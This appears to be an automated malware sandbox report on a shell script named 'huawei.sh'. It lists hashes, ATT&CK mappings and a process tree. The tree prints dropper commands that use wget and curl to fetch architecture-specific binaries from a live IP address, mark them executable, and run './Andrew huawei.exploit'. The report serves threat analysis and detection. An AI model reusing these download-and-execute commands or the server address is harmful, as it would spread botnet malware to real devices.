327c9cb0c729c36cd319c1c289868f40cdfecd6cf41b9697cfdfdc48dd38c827

Analysis

max time kernel
9s
max time network
14s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11-12-2024 21:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

huawei.sh
Size

2KB
MD5

d733ae5816517dae48097b7f847accb5
SHA1

72997aecdd0ab479d3678cf57a57d4a2f10fcf11
SHA256

327c9cb0c729c36cd319c1c289868f40cdfecd6cf41b9697cfdfdc48dd38c827
SHA512

827cf08cc886e6404480bdbfadc55467bef16099b104734ed664fc608109ac09c248be8f83b4938c5f7a073a97a14c5f01ef33ec8acb16bd0f34b2debf32593e

Score

7^/10

antivm defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
688	chmod
701	chmod
743	chmod
752	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/Andrew	689	Andrew
/tmp/Andrew	703	Andrew
/tmp/Andrew	745	Andrew
/tmp/Andrew	753	Andrew

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-3.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-9.dat	upx

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
756	wget

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/i686	wget
File opened for modification	/tmp/i686	curl
File opened for modification	/tmp/x86_64	wget
File opened for modification	/tmp/x86_64	curl
File opened for modification	/tmp/i486	curl
File opened for modification	/tmp/Andrew	huawei.sh
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/x86	curl

/tmp/huawei.sh
/tmp/huawei.sh
1⤵
- Writes file to tmp directory
PID:655
- /usr/bin/wget
  wget http://37.114.41.90/bins/i486
  2⤵
  PID:657
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/i486
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:670
- /bin/cat
  cat i486
  2⤵
  PID:687
- /bin/chmod
  chmod +x Andrew huawei.sh i486 systemd-private-70759aca9265438490028fe231c10a70-systemd-timedated.service-0zxY1i
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/Andrew
  ./Andrew huawei.exploit
  2⤵
  - Executes dropped EXE
  PID:689
- /usr/bin/wget
  wget http://37.114.41.90/bins/x86
  2⤵
  - Writes file to tmp directory
  PID:690
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:694
- /bin/cat
  cat x86
  2⤵
  PID:700
- /bin/chmod
  chmod +x Andrew huawei.sh i486 systemd-private-70759aca9265438490028fe231c10a70-systemd-timedated.service-0zxY1i x86
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/Andrew
  ./Andrew huawei.exploit
  2⤵
  - Executes dropped EXE
  PID:703
- /usr/bin/wget
  wget http://37.114.41.90/bins/i686
  2⤵
  - Writes file to tmp directory
  PID:705
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:720
- /bin/cat
  cat i686
  2⤵
  PID:742
- /bin/chmod
  chmod +x Andrew huawei.sh i486 i686 systemd-private-70759aca9265438490028fe231c10a70-systemd-timedated.service-0zxY1i x86
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/Andrew
  ./Andrew huawei.exploit
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://37.114.41.90/bins/x86_64
  2⤵
  - Writes file to tmp directory
  PID:747
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:748
- /bin/cat
  cat x86_64
  2⤵
  PID:749
- /bin/chmod
  chmod +x Andrew huawei.sh i486 i686 systemd-private-70759aca9265438490028fe231c10a70-systemd-timedated.service-0zxY1i x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/Andrew
  ./Andrew huawei.exploit
  2⤵
  - Executes dropped EXE
  PID:753
- /usr/bin/wget
  wget http://37.114.41.90/bins/mips
  2⤵
  - System Network Configuration Discovery
  PID:756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/i486

Filesize
274B

MD5
090e35476de39030dfeafbcf3d3e3f43

SHA1
a4bd408cec5d1185b478e528cf60a9f5186e0b87

SHA256
0085db6c6f0d1ba4e0ea26fcc04cd3afc69a900a9fd087079c4957364bf4dd1b

SHA512
55c266d1a3bb285ec821ecac894c2f5dbae7798c08e4f829db0e8c06f22084a919ef0fb17a1ddf4640228453bee8555fa6f69025c398292c5c8382e3c466a181

Download Submit
/tmp/i686

Filesize
28KB

MD5
15fb222600a3061f5c8e5ef04e5298a6

SHA1
93b4a17632479c8a45e2554a18ea61ea7365c532

SHA256
fff08f2a1a9c20d447ac5cacb89df1287bb830a2fc0cd5866d31d9f3ba653965

SHA512
11e390838b35bdacfa84ebdfc076f564abc1538bc972895b81d2156be52177bb25d62662871ae624747cca29e089a7a9a6ef205db4c694a2c106641d33942c34

Download Submit
/tmp/x86

Filesize
28KB

MD5
54d07ade0004f03aaca028523d8f3eb6

SHA1
73606fc68439ea7ceb148f94d61dbe0235da8355

SHA256
d1270e8be4de4713834930df984a515448ca8dd0acc7b0e03e5aa7fc4428882b

SHA512
43ce9c67151734e6e907a4bf30c06e41b52d524c388273380506b604ce3fed2779ef057b282737b1e05c11055611a4bd0559567253fb1b0f3309114e20eadf4b

Download Submit
/tmp/x86_64

Filesize
28KB

MD5
9cc970e0631afa61a049848f4f368b12

SHA1
54d7d99f436e9c97da5bfdd43698bb1dbd679b29

SHA256
681951c3fa70c2d14fe48e3c829f9f62f04f8fa9b430c0a87e849e397333dc16

SHA512
9f5bcd759af164b0e22479d44806dce6d3ca3e2b62fa3ac154b83111804cd1ee1df4b549fff0e8ab72d2a2d66dadb0f8f1cc301fee83a711e5c4055c2ee3567e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads